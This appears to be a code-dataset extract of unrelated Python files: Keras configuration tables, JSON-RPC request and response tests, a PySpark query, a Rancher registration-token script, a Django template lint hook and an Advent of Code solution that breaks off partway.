content
stringlengths 5
1.05M
|
|---|
import webapp2.api as API
API.menuItems = [
{ 'caption': 'Dashboard',
'icon': 'dashboard',
'route': '/dashboard'
},
{ 'caption': 'Administration',
'icon': 'settings',
'children': []
},
{ 'caption': 'Feedback',
'icon': 'feedback',
'route': '/feedback'
}
]
|
import functools
import os
import struct
import typing
from collections import UserList
def to_bytearray_deco(func):
@functools.wraps(func)
def wrap(datatype):
packed = func(datatype)
array = ByteArray(packed)
return array
return wrap
def to_bytearray(data, little_endian=False, signed=False):
return to_bytearray_deco(lambda datatype: datatype)(data)
class ByteArray(UserList):
def __init__(self, iterable: typing.Iterable):
super().__init__()
self.data = []
if isinstance(iterable, ByteArray):
self.data = iterable.data
else:
for value in iterable:
self.data.append(Int8(value))
def __setitem__(self, key, value):
try:
if isinstance(key, slice):
start = key.start
stop = key.stop
if start is None:
start = 0
if stop is None:
stop = len(self.data) - 1
if len(value) > stop - start:
raise ValueError("Value is too long")
elif start < len(self.data) and stop < len(self.data):
for item_n, item in enumerate(value):
self[start + item_n] = item
else:
raise ValueError()
elif isinstance(value, Int8):
self.data[key] = value
else:
self.data[key] = Int8(value)
except IndexError:
for _ in range(len(self.data), key):
self.data.append(0)
if isinstance(value, Int8):
self.data.append(value)
else:
self.data.append(Int8(value))
def __getitem__(self, item):
return self.data[item]
def to_bytes(self, reverse=False):
if reverse:
return bytes(self.data[::-1])
return bytes(self.data)
def encrypt(self, crypt):
encrypted = crypt.encrypt(bytes(self))
self.data = encrypted
def __repr__(self):
return str(bytes(self))
def __bytes__(self):
return struct.pack("!{}".format("b" * len(self.data)), *[int(i) for i in self.data])
def pad(self, pad_length):
self[len(self.data) - 1 + pad_length] = 0
def append(self, item) -> None:
array = item.encode() if not isinstance(item, ByteArray) else item
self.data += array.data
@classmethod
def random(cls, length):
return cls(os.urandom(length))
def __hex__(self):
return bytes(self.data).hex()
def hex(self):
return bytes(self).hex()
@classmethod
def from_hex(cls, hex_data):
return cls(bytes.fromhex(hex_data))
def extend(self, other) -> None:
for item in other:
self.append(item)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-01-07 13:10:57
# @Author : Joe Gao (jeusgao@163.com)
from backend import keras, V_TF
from keras_bert.layers import MaskedGlobalMaxPool1D
from .graph_attention_layer import GraphAttention
from .models import base_embed, bert_base, get_model, nonmask_embed
from .optimizers import adam, adam_warmup, AdamEMA
from .tokenizers import tokenizer_zh, kwr_labeler, cls_labeler
from .callbacks import TrainingCallbacks, EvaluatingCallbacks
from .generators import spo_data_generator_train, data_generator_train, data_generator_pred
from .funcs import gather_words, get_square, init_truncated_normal
from .embedding import EmbedModel
from .layers import (
base_inputs,
NonMaskingLayer,
bi_gru,
dropout,
layer_normalization,
batch_normalization,
reshape,
)
from keras_metrics import (
categorical_precision,
categorical_recall,
categorical_f1_score,
binary_precision,
binary_recall,
binary_f1_score,
)
DIC_Inits = {
'truncated': {'func': init_truncated_normal}
}
DIC_Funcs = {
'gather_words': gather_words,
'get_square': get_square,
}
DIC_Losses = {
'categorical_crossentropy': {
'func': keras.losses.CategoricalCrossentropy(),
# 'params': {'from_logits': False},
},
'binarycrossentropy': {
'func': keras.losses.BinaryCrossentropy(),
# 'params': {'from_logits': False},
},
'sparse_categorical_crossentropy': {
'func': keras.losses.SparseCategoricalCrossentropy(),
}
}
DIC_Metrics = {
# 'categorical_precision': {'func': categorical_precision, 'params': {'label': 0}},
# 'categorical_recall': {'func': categorical_recall, 'params': {'label': 0}},
# 'categorical_f1_score': {'func': categorical_f1_score, 'params': {'label': 0}},
'accuracy': {'func': 'accuracy'},
'binary_accuracy': {'func': keras.metrics.BinaryAccuracy()},
'binary_precision': {'func': binary_precision()},
'binary_recall': {'func': binary_recall()},
'binary_f1_score': {'func': binary_f1_score()},
'categorical_accuracy': {'func': keras.metrics.CategoricalAccuracy()},
'precision': {'func': keras.metrics.Precision()},
'recall': {'func': keras.metrics.Recall()},
'sparse_categorical_accuracy': {'func': keras.metrics.SparseCategoricalAccuracy()},
}
DIC_Layers = {
# 'base_inputs': {'func': base_inputs},
'nonmasking_layer': {'func': NonMaskingLayer},
'input': {'func': keras.layers.Input, 'params': {'shape': (None,)}},
'dense': {'func': keras.layers.Dense, 'params': {'units': 64, 'activation': 'relu'}},
'lambda': {'func': keras.layers.Lambda, 'params': ''},
'bigru': {'func': bi_gru, 'params': {'units': 64, 'return_sequences': True, 'reset_after': True}},
'dropout': {'func': dropout, 'params': {'rate': 0.1}},
'masked_global_max_pool1D': {'func': MaskedGlobalMaxPool1D, 'params': {'name': 'Masked-Global-Pool-Max'}},
'layer_normalization': {'func': layer_normalization, 'params': {'axis': -1, 'epsilon': 0.001, }},
'batch_normalization': {'func': batch_normalization, 'params': {'axis': -1, 'epsilon': 0.001, }},
'reshape': {'func': reshape, 'params': [1, 1]}
}
if V_TF >= '2.2':
from .layers import KConditionalRandomField
kcrf = KConditionalRandomField()
DIC_Layers['kcrf'] = {'func': kcrf}
DIC_Losses['kcrf_loss'] = {'func': kcrf.loss}
DIC_Metrics['kcrf_accuracy'] = {'func': kcrf.accuracy}
else:
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy as crf_accuracy
from .layers import crf
DIC_Layers['crf'] = {'func': crf, 'params': {'dim': 2}}
DIC_Losses['crf_loss'] = {'func': crf_loss}
DIC_Metrics['crf_accuracy'] = {'func': crf_accuracy}
DIC_Bases = {
'BERT': {
'func': bert_base,
'params': {
'fn_config': None,
'fn_base_model': None,
'training': False,
'trainable': False,
'seq_len': 512
}
},
}
DIC_Models = {
'base_embed': {'func': base_embed},
'nonmask_embed': {'func': nonmask_embed},
}
DIC_Optimizers = {
'adam': {'func': adam, 'params': {'lr': 1e-4}},
'adam_warmup': {
'func': adam_warmup,
'params': {
'len_data': 1000,
'batch_size': 128,
'epochs': 5,
'warmup_proportion': 0.1,
'lr': 1e-4,
'min_lr': 1e-5,
}
},
'AdamEMA': {
'func': AdamEMA,
'params': {
'learning_rate': 1e-6,
}
},
}
DIC_Tokenizers = {
'tokenizer_zh': {'func': tokenizer_zh, 'params': {'fn_vocab': None}},
}
DIC_Labelers = {
'kwr_labeler': {'func': kwr_labeler},
'cls_labeler': {'func': cls_labeler},
}
DIC_Generators_for_train = {
'spo_data_generator_train': {
'func': spo_data_generator_train,
'params': {
'data': None,
'Y': None,
'tokenizer': None,
'dim': 2,
'maxlen': 512,
'labeler': None,
'activation': 'sigmoid',
}
},
'data_generator_for_train': {
'func': data_generator_train,
'params': {
'data': None,
'Y': None,
'tokenizer': None,
'dim': 2,
'maxlen': 512,
'labeler': None,
'activation': 'sigmoid',
},
}
}
DIC_Generators_for_pred = {
'data_generator_for_pred': {
'func': data_generator_pred,
}
}
|
import json
import sys
from ..exceptions import JSONRPCInvalidRequestException, JSONRPCInvalidResponseException
from ..jsonrpc2 import (
JSONRPC20Request,
JSONRPC20BatchRequest,
JSONRPC20Response,
JSONRPC20BatchResponse,
)
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
class TestJSONRPC20Request(unittest.TestCase):
""" Test JSONRPC20Request functionality."""
def setUp(self):
self.request_params = {
"method": "add",
"params": [1, 2],
"_id": 1,
}
def test_correct_init(self):
""" Test object is created."""
JSONRPC20Request(**self.request_params)
def test_validation_incorrect_no_parameters(self):
with self.assertRaises(ValueError):
JSONRPC20Request()
def test_method_validation_str(self):
self.request_params.update({"method": "add"})
JSONRPC20Request(**self.request_params)
def test_method_validation_not_str(self):
self.request_params.update({"method": []})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": {}})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_method_validation_str_rpc_prefix(self):
""" Test method SHOULD NOT starts with rpc. """
self.request_params.update({"method": "rpc."})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpc.test"})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpccorrect"})
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpc"})
JSONRPC20Request(**self.request_params)
def test_params_validation_list(self):
self.request_params.update({"params": []})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": [0]})
JSONRPC20Request(**self.request_params)
def test_params_validation_tuple(self):
self.request_params.update({"params": ()})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": tuple([0])})
JSONRPC20Request(**self.request_params)
def test_params_validation_dict(self):
self.request_params.update({"params": {}})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": {"a": 0}})
JSONRPC20Request(**self.request_params)
def test_params_validation_none(self):
self.request_params.update({"params": None})
JSONRPC20Request(**self.request_params)
def test_params_validation_incorrect(self):
self.request_params.update({"params": "str"})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_request_args(self):
self.assertEqual(JSONRPC20Request("add").args, ())
self.assertEqual(JSONRPC20Request("add", []).args, ())
self.assertEqual(JSONRPC20Request("add", {"a": 1}).args, ())
self.assertEqual(JSONRPC20Request("add", [1, 2]).args, (1, 2))
def test_request_kwargs(self):
self.assertEqual(JSONRPC20Request("add").kwargs, {})
self.assertEqual(JSONRPC20Request("add", [1, 2]).kwargs, {})
self.assertEqual(JSONRPC20Request("add", {}).kwargs, {})
self.assertEqual(JSONRPC20Request("add", {"a": 1}).kwargs, {"a": 1})
def test_id_validation_string(self):
self.request_params.update({"_id": "id"})
JSONRPC20Request(**self.request_params)
def test_id_validation_int(self):
self.request_params.update({"_id": 0})
JSONRPC20Request(**self.request_params)
def test_id_validation_null(self):
self.request_params.update({"_id": "null"})
JSONRPC20Request(**self.request_params)
def test_id_validation_none(self):
self.request_params.update({"_id": None})
JSONRPC20Request(**self.request_params)
def test_id_validation_float(self):
self.request_params.update({"_id": 0.1})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_id_validation_incorrect(self):
self.request_params.update({"_id": []})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"_id": ()})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_data_method_1(self):
r = JSONRPC20Request("add")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_method_2(self):
r = JSONRPC20Request(method="add")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_method_3(self):
r = JSONRPC20Request("add", None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_params_1(self):
r = JSONRPC20Request("add", params=None, _id=None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_params_2(self):
r = JSONRPC20Request("add", [])
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
})
def test_data_params_3(self):
r = JSONRPC20Request("add", ())
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
})
def test_data_params_4(self):
r = JSONRPC20Request("add", (1, 2))
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [1, 2],
"id": None,
})
def test_data_params_5(self):
r = JSONRPC20Request("add", {"a": 0})
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": {"a": 0},
"id": None,
})
def test_data_id_1(self):
r = JSONRPC20Request("add", _id="null")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": "null",
})
def test_data_id_1_notification(self):
r = JSONRPC20Request("add", _id="null", is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_2(self):
r = JSONRPC20Request("add", _id=None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_id_2_notification(self):
r = JSONRPC20Request("add", _id=None, is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_3(self):
r = JSONRPC20Request("add", _id="id")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": "id",
})
def test_data_id_3_notification(self):
r = JSONRPC20Request("add", _id="id", is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_4(self):
r = JSONRPC20Request("add", _id=0)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": 0,
})
def test_data_id_4_notification(self):
r = JSONRPC20Request("add", _id=0, is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_is_notification(self):
r = JSONRPC20Request("add")
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id=None)
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id="null")
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id=0)
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", is_notification=True)
self.assertTrue(r.is_notification)
r = JSONRPC20Request("add", is_notification=True, _id=None)
self.assertTrue(r.is_notification)
self.assertNotIn("id", r.data)
r = JSONRPC20Request("add", is_notification=True, _id=0)
self.assertTrue(r.is_notification)
self.assertNotIn("id", r.data)
def test_set_unset_notification_keep_id(self):
r = JSONRPC20Request("add", is_notification=True, _id=0)
self.assertTrue(r.is_notification)
self.assertFalse("id" in r.data)
r.is_notification = False
self.assertFalse(r.is_notification)
self.assertTrue("id" in r.data)
self.assertEqual(r.data["id"], 0)
def test_serialize_method_1(self):
r = JSONRPC20Request("add")
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": None,
}, json.loads(r.json))
def test_serialize_method_2(self):
r = JSONRPC20Request(method="add")
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": None,
}, json.loads(r.json))
def test_serialize_method_3(self):
r = JSONRPC20Request("add", None)
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": None,
}, json.loads(r.json))
def test_serialize_params_1(self):
r = JSONRPC20Request("add", params=None, _id=None)
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": None,
}, json.loads(r.json))
def test_serialize_params_2(self):
r = JSONRPC20Request("add", [])
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
}, json.loads(r.json))
def test_serialize_params_3(self):
r = JSONRPC20Request("add", ())
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
}, json.loads(r.json))
def test_serialize_params_4(self):
r = JSONRPC20Request("add", (1, 2))
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"params": [1, 2],
"id": None,
}, json.loads(r.json))
def test_serialize_params_5(self):
r = JSONRPC20Request("add", {"a": 0})
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"params": {"a": 0},
"id": None,
}, json.loads(r.json))
def test_serialize_id_1(self):
r = JSONRPC20Request("add", _id="null")
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": "null",
}, json.loads(r.json))
def test_serialize_id_2(self):
r = JSONRPC20Request("add", _id=None)
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": None,
}, json.loads(r.json))
def test_serialize_id_3(self):
r = JSONRPC20Request("add", _id="id")
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": "id",
}, json.loads(r.json))
def test_serialize_id_4(self):
r = JSONRPC20Request("add", _id=0)
self.assertTrue({
"jsonrpc": "2.0",
"method": "add",
"id": 0,
}, json.loads(r.json))
def test_from_json_request_no_id(self):
str_json = json.dumps({
"method": "add",
"params": [1, 2],
"jsonrpc": "2.0",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, [1, 2])
self.assertEqual(request._id, None)
self.assertTrue(request.is_notification)
def test_from_json_request_no_params(self):
str_json = json.dumps({
"method": "add",
"jsonrpc": "2.0",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, None)
self.assertEqual(request._id, None)
self.assertTrue(request.is_notification)
def test_from_json_request_null_id(self):
str_json = json.dumps({
"method": "add",
"jsonrpc": "2.0",
"id": None,
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, None)
self.assertEqual(request._id, None)
self.assertFalse(request.is_notification)
def test_from_json_request(self):
str_json = json.dumps({
"method": "add",
"params": [0, 1],
"jsonrpc": "2.0",
"id": "id",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, [0, 1])
self.assertEqual(request._id, "id")
self.assertFalse(request.is_notification)
def test_from_json_invalid_request_jsonrpc(self):
str_json = json.dumps({
"method": "add",
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_from_json_invalid_request_method(self):
str_json = json.dumps({
"jsonrpc": "2.0",
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_from_json_invalid_request_extra_data(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"method": "add",
"is_notification": True,
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_data_setter(self):
request = JSONRPC20Request(**self.request_params)
with self.assertRaises(ValueError):
request.data = []
with self.assertRaises(ValueError):
request.data = ""
with self.assertRaises(ValueError):
request.data = None
class TestJSONRPC20BatchRequest(unittest.TestCase):
""" Test JSONRPC20BatchRequest functionality."""
def test_batch_request(self):
request = JSONRPC20BatchRequest(
JSONRPC20Request("devide", {"num": 1, "denom": 2}, _id=1),
JSONRPC20Request("devide", {"num": 3, "denom": 2}, _id=2),
)
self.assertEqual(json.loads(request.json), [
{"method": "devide", "params": {"num": 1, "denom": 2}, "id": 1,
"jsonrpc": "2.0"},
{"method": "devide", "params": {"num": 3, "denom": 2}, "id": 2,
"jsonrpc": "2.0"},
])
def test_from_json_batch(self):
str_json = json.dumps([
{"method": "add", "params": [1, 2], "jsonrpc": "2.0"},
{"method": "mul", "params": [1, 2], "jsonrpc": "2.0"},
])
requests = JSONRPC20BatchRequest.from_json(str_json)
self.assertTrue(isinstance(requests, JSONRPC20BatchRequest))
for r in requests:
self.assertTrue(isinstance(r, JSONRPC20Request))
self.assertTrue(r.method in ["add", "mul"])
self.assertEqual(r.params, [1, 2])
self.assertEqual(r._id, None)
self.assertTrue(r.is_notification)
def test_from_json_batch_one(self):
str_json = json.dumps([
{"method": "add", "params": [1, 2], "jsonrpc": "2.0", "id": None},
])
requests = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(requests, JSONRPC20BatchRequest))
requests = list(requests)
self.assertEqual(len(requests), 1)
r = requests[0]
self.assertTrue(isinstance(r, JSONRPC20Request))
self.assertEqual(r.method, "add")
self.assertEqual(r.params, [1, 2])
self.assertEqual(r._id, None)
self.assertFalse(r.is_notification)
def test_response_iterator(self):
requests = JSONRPC20BatchRequest(
JSONRPC20Request("devide", {"num": 1, "denom": 2}, _id=1),
JSONRPC20Request("devide", {"num": 3, "denom": 2}, _id=2),
)
for request in requests:
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "devide")
class TestJSONRPC20Response(unittest.TestCase):
""" Test JSONRPC20Response functionality."""
def setUp(self):
self.response_success_params = {
"result": "",
"_id": 1,
}
self.response_error_params = {
"error": {
"code": 1,
"message": "error",
},
"_id": 1,
}
def test_correct_init(self):
""" Test object is created."""
JSONRPC20Response(**self.response_success_params)
def test_validation_incorrect_no_parameters(self):
with self.assertRaises(ValueError):
JSONRPC20Response()
def test_validation_incorrect_result_and_error(self):
response = JSONRPC20Response(error={"code": 1, "message": ""})
with self.assertRaises(ValueError):
response.result = ""
def test_validation_error_correct(self):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect(self):
self.response_error_params["error"].update({"code": "str"})
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_no_code(self):
del self.response_error_params["error"]["code"]
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_no_message(self):
del self.response_error_params["error"]["message"]
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_message_not_str(self):
self.response_error_params["error"].update({"message": 0})
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_id(self):
response = JSONRPC20Response(**self.response_success_params)
self.assertEqual(response._id, self.response_success_params["_id"])
def test_validation_id_incorrect_type(self):
response = JSONRPC20Response(**self.response_success_params)
with self.assertRaises(ValueError):
response._id = []
with self.assertRaises(ValueError):
response._id = {}
with self.assertRaises(ValueError):
response._id = 0.1
def test_data_result(self):
r = JSONRPC20Response(result="")
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": None,
})
def test_data_result_id_none(self):
r = JSONRPC20Response(result="", _id=None)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": None,
})
def test_data_result_id(self):
r = JSONRPC20Response(result="", _id=0)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": 0,
})
def test_data_error(self):
r = JSONRPC20Response(error={"code": 0, "message": ""})
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": None,
})
def test_data_error_id_none(self):
r = JSONRPC20Response(error={"code": 0, "message": ""}, _id=None)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": None,
})
def test_data_error_id(self):
r = JSONRPC20Response(error={"code": 0, "message": ""}, _id=0)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": 0,
})
def test_data_setter(self):
response = JSONRPC20Response(**self.response_success_params)
with self.assertRaises(ValueError):
response.data = []
with self.assertRaises(ValueError):
response.data = ""
with self.assertRaises(ValueError):
response.data = None
def test_from_json_invalid_response_jsonrpc(self):
str_json = json.dumps({
"result": None,
"id": 0,
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_id(self):
str_json = json.dumps({
"result": None,
"jsonrpc": "2.0",
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_no_result_error(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_result_and_error(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
"error": {"code": 1, "message": ""}
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_extra_data(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
"error": {"code": 1, "message": ""},
"extra-data": ""
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_response_result_null(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertIsNone(response.result)
self.assertIsNone(response.error)
self.assertEqual(response._id, 0)
def test_from_json_response_result(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": [1, 2, 3],
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertEqual(response.result, [1, 2, 3])
self.assertIsNone(response.error)
self.assertEqual(response._id, 0)
def test_from_json_response_error(self):
error = {'code': 1, 'message': ''}
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"error": error,
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertIsNone(response.result)
self.assertEqual(response.error, error)
self.assertEqual(response._id, 0)
class TestJSONRPC20BatchResponse(unittest.TestCase):
""" Test JSONRPC20BatchResponse functionality."""
def test_batch_response(self):
response = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(error={"code": 0, "message": ""}, _id=2),
)
self.assertEqual(json.loads(response.json), [
{"result": "result", "id": 1, "jsonrpc": "2.0"},
{"error": {"code": 0, "message": ""}, "id": 2, "jsonrpc": "2.0"},
])
def test_response_iterator(self):
responses = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(result="result", _id=2),
)
for response in responses:
self.assertTrue(isinstance(response, JSONRPC20Response))
self.assertEqual(response.result, "result")
def test_batch_response_data(self):
response = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(result="result", _id=2),
JSONRPC20Response(result="result"),
)
self.assertEqual(response.data, [
{"id": 1, "jsonrpc": "2.0", "result": "result"},
{"id": 2, "jsonrpc": "2.0", "result": "result"},
{"id": None, "jsonrpc": "2.0", "result": "result"},
])
|
from pyspark.sql.types import StructType, StructField, IntegerType, StringType
spark = SparkSession.builder.getOrCreate()
# For escuelasPR.csv file
school_schema = StructType([
StructField("school_region", StringType(), True),
StructField("school_district", StringType(), True),
StructField("city", StringType(), True),
StructField("school_id", IntegerType(), True),
StructField("school_name", StringType(), True),
StructField("school_level", StringType(), True),
StructField("college_board_id", IntegerType(), True)])
school_df = spark.read.csv(path="/user/jramirez/data/escuelasPR.csv",header=False,schema=school_schema)
# SQL
school_df.createOrReplaceTempView("school")
sql_query = "select school_region, school_district, city, count(*) as num_schools " \
"from school " \
"where school_region = 'Arecibo' " \
"group by school_region, school_district, city " \
"order by school_district"
spark.sql(sql_query).show()
|
import requests
from config import bot_url, api_secret
from typing import List
_bot_headers = {
'authorization': f"Bearer srv.{api_secret}"
}
def _build_bot_url(path: str):
return f"{bot_url}{path}"
def bot_add_roles(user_id: str, guild_id: str, role_ids: List[str]):
r = requests.post(_build_bot_url("/add-roles"), json={
'user_id': user_id,
'guild_id': guild_id,
'role_ids': role_ids
}, headers=_bot_headers)
|
default_app_config = 'dcodex_carlson.apps.DcodexCarlsonConfig'
|
#!/usr/bin/env python
import sys
import requests
from cattle import from_env
url = sys.argv[1]
r = requests.get(url)
if r.status_code == 200 and r.text.startswith('#!/bin/sh'):
print url
sys.exit(0)
r = requests.get(sys.argv[1])
try:
url = r.headers['X-API-Schemas']
except KeyError:
url = sys.argv[1]
client = from_env(url=url)
if not client.valid():
print 'Invalid client'
sys.exit(1)
if 'POST' not in client.schema.types['registrationToken'].collectionMethods:
projects = client.list_project(uuid='adminProject')
if len(projects) == 0:
print 'Failed to find admin resource group'
sys.exit(1)
client = from_env(url=projects[0].links['schemas'])
if not client.valid():
print 'Invalid client'
sys.exit(1)
tokens = client.list_registrationToken(state='active')
if len(tokens) == 0:
token = client.create_registrationToken()
else:
token = tokens[0]
token = client.wait_success(token)
print token.registrationUrl
|
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
import argparse
import io
def main(argv=None):
args = parse_args(argv)
dirtiness_results = {
check_and_report_file_blocktrans_dirtiness(filename)
for filename in args.filenames
}
return 0 if dirtiness_results == {False} else 1
def check_and_report_file_blocktrans_dirtiness(path):
dirty = has_dirty_blocktrans(path)
if dirty:
print(path)
return dirty
def has_dirty_blocktrans(path):
"""
Quick and dirty check for a multi-line blocktrans lacking a trimmed
directive.
A more solid approach would involve the Django HTML template parser, e.g.
see https://stackoverflow.com/a/24583004/392743
"""
with io.open(path, encoding='utf-8') as infile:
for line in infile:
if '{% blocktrans' in line and '{% endblocktrans' not in line:
if 'trimmed' not in line:
return True
return False
def parse_args(argv=None):
parser = argparse.ArgumentParser()
parser.add_argument('filenames', nargs='*', help='Filenames to fix')
return parser.parse_args(argv)
if __name__ == '__main__':
exit(main())
|
from .caveat import Caveat
from .macaroon import Macaroon
from .macaroon import MACAROON_V1
from .macaroon import MACAROON_V2
from .verifier import Verifier
__all__ = [
'Macaroon',
'Caveat',
'Verifier',
'MACAROON_V1',
'MACAROON_V2'
]
__author__ = 'Evan Cordell'
__version__ = "0.13.0"
__version_info__ = tuple(__version__.split('.'))
__short_version__ = __version__
|
TEST = [(
"""
00100
11110
10110
10111
10101
01111
00111
11100
10000
11001
00010
01010
""",
198,
)]
TEST2 = [(
"""
00100
11110
10110
10111
10101
01111
00111
11100
10000
11001
00010
01010
""",
230,
)]
import sys
from pathlib import Path
from collections import defaultdict, Counter
import math
# import local AOC lib
sys.path.append(str(Path(__file__).parent.parent.parent))
import aoc
@aoc.submit(part=1)
@aoc.get_input
@aoc.tests(TEST)
@aoc.parse_text
def part_1(raw: str, ints: list[int], strs: list[str]):
bit_counts = defaultdict(lambda: {"0": 0, "1": 1})
for line in strs:
for i, bit in enumerate(line):
bit_counts[i][bit] += 1
gr = ""
er = ""
for counts in bit_counts.values():
gr += "1" if counts["1"] > counts["0"] else "0"
er += "1" if counts["1"] < counts["0"] else "0"
return int(gr, 2) * int(er, 2)
@aoc.submit(part=2)
@aoc.get_input
@aoc.tests(TEST2)
@aoc.parse_text
def part_2(raw: str, ints: list[int], strs: list[str]):
oxy = strs
co2 = strs
for bit in range(len(strs[0])):
o = defaultdict(list)
c = defaultdict(list)
for n in oxy:
o[n[bit]].append(n)
for n in co2:
